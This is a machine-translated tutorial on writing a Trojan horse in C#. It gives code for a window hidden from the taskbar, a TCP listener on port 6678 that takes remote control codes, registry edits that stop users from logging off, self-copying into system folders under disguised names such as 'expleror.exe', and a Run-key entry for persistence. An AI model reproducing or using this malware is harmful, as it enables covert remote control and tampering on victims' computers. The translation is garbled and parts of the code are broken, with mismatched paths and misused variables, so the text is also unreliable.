A detailed explanation of Trojan horse program based on C
- 2020-06-23 01:50:34
- OfStack
This article takes C# as an example to explain the implementation process of Trojan horse program. To achieve the Trojan service procedures, mainly to achieve the following functions: the background of the operation (hidden technology), control code received and registry modification, the following three aspects for the introduction:
In C # 1, and set up a background service program is easy, to establish a new C # Windows application, project name set (but can be used to conceal and system of similar names, such as svchost. exe, etc.), will form attribute "ShowInTaskbar" attribute set to false, let it run time will not be shown in the task bar, and the attribute "Windowstate attribute set to" Mininized can, so that the form can hide run. Of course, you can also set it in InitializeComponent(). This function initializes and runs before the form is displayed, as follows:
private void InitializeComponent()
{
//
// Form1
//
// The starting point and size of the form display
this.AutoScaleBaseSize = new System.Drawing.Size(6, 14);
this.ClientSize = new System.Drawing.Size(368, 357);
// Name of the form
this.Name = "Form1";
// Set the properties to run in the background
this.ShowInTaskbar = false;
this.Text = "Form1";
this.WindowState = System.Windows.Forms.FormWindowState.Minimized;
}
2, control the code reception, must be started at the beginning of the service program run, so the listening thread must be started in the program initialization, so put in the form's constructor, code annotations are as follows:
public Form1() // The constructor for the form
{
//
// Windows Forms designer support required
//
InitializeComponent();
//
// TODO: in InitializeComponent Add any constructor code after the call
// Add your listening code
// You can set the port yourself. I used a fixed port
int port =6678;
//System.Net.Sockets.TcpListener Is used in Tcp Listens for clients in the network
listener = new TcpListener(port);
// Start the listener
listener.Start();
// Increase the thread receiving the control code, if you want to stop the thread can be used Thread.abort()
//reControlCode Is a function that the thread starts to execute, based on the received control
// The control code selects the appropriate registry modification function
Thread thread = new Thread(new ThreadStart(reControlCode));
thread.Start();
}
reControlCode function is as follows. See the program for the complete code:
private void reControlCode()
{
// Set the receive socket, receive listener.AcceptSocket Is to return a request from a customer that has been received
socket = listener.AcceptSocket();
// If the connection executes successfully
while (socket.Connected)
{
// Receiving control code
byte [] by =new byte[6];
int i = socket.Receive(by,by.Length ,0);
string ss = System.Text.Encoding.ASCII.GetString(by);
// Perform different functions according to the control code
// Modify the registry to add encodings
switch (ss)
{
case "jiance":// Test connection, return test information
string str ="hjc";
byte [] bytee = System.Text.Encoding.ASCII.GetBytes(str);
socket.Send(bytee,0,bytee.Length,0);
break;
case "zx1000":
// Modify the registry function to define its own, see the analysis below
UnLogOff();
// Return control message
retMessage();
break;
case "zx0100":
// Modify the registry function
UnClose();
// Return control message
retMessage();
break;
// repeated case Functions and the previous 1 Sample, slightly off
default:
break;
}//case
}//while
} //private void reControlCode
3, C# to achieve the registry modification, using the The System.Microsoft.Win32 command space in the NET class library provides two types of classes: those that handle events raised by the operating system and those that operate on the system registry. You can see how it is used below. Here I made a subroutine to modify the registry: make the computer unable to log out. Before the understanding of the registry, in the key SOFTWARE / / Microsoft / / Windows / / CurrentVersion / / / / Explorer Policies
Set the key NoLogOff to 1 to make the computer unlogout. Changes to the registry are implemented using C# in the following functions:
private void UnLogOff()
{
// Gets the top-level node of the host's registry
Microsoft.Win32.RegistryKey rLocal = Registry.LocalMachine;
// Set up the 1 Variables for each of the registry's child keys
RegistryKey key1;
try
{
// function RegistryKey.OpenSubkey(string registrykey,bool canwrite) Retrieves the specified child key
//registrykey Is the user specified key value, canwrite for true Can be modified, default is fasle Do not change
key1 =
rLocal.OpenSubKey("SOFTWARE//Microsoft//Windows//CurrentVersion//Policies//Explorer",true);
// Sets the key name and value of the child key
key1.SetValue ("NoLogOff",1);
// Close the open child key
key1.Close();
// Warning string setting
mystr = mystr +"HKEY_LOCAL_MACHINE//SOFTWARE//Microsoft//Windows//CurrentVersion//Policies//Explorer The key value Nologoff Be modified! Please put it as 0!";
}
catch{}
// If there is no self built
if(key1 ==null)
{
try
{
// use RegistryKey.CreateSubKey(string mystring) Function to create the child keys you need
RegistryKey key2 = rLocal.CreateSubKey("SOFTWARE//Microsoft//Windows//CurrentVersion//Policies//Explorer");
key2.SetValue("NoLogOff",1);
key2.Close();
mystr = mystr +"HKEY_LOCAL_MACHINE//SOFTWARE//Microsoft//Windows//CurrentVersion//Policies//Explorer The key value Nologoff Be modified! Please put it as 0!";
}
catch{}
}
}
4, in the Trojan program there is an important function is the replication and transfer of self. When the Trojan horse is introduced to the controlled host, it is necessary to automatically hide the Trojan horse in the directory of System,System32 to avoid detection. Transfer code analysis is as follows, the main implementation is the function of moving D plate under the trojans to C: / / winnnt / / system / / msdoss exe, change the name at the same time. The use of. The NET namespace System.IO is used to allow both synchronous and asynchronous reads and writes to data streams and files. Here we use the System.IO.File class.
private void moveCC1()
{
try
{
// function File.Move(string sourceFileName,string destFileName) Moves files
//sourceFileName Is the file name to move, destFileName The new path for the file
File.Move("C://winnnt//system//msdoss.exe","d://winnt//system32//expleror.exe");
}
catch {}
// Set the new Trojan horse to start itself. Analysis and preceding 1 sample
try
{
key1 = rLocal.OpenSubKey("SOFTWARE//Microsoft//Windows//CurrentVersion//Run",true);
key1.SetValue ("microsoftt","d://winnt//system32//expleror.exe");
key1.Close();
}
catch{}
if(key1 ==null)
{
try
{
RegistryKey key2=rLocal.CreateSubKey("SOFTWARE//Microsoft//Windows//CurrentVersion//Run");
key1.SetValue ("microsoftt","d://winnt//system32//expleror.exe");
key1.Close();
}
catch{}
}
} //moveCC1()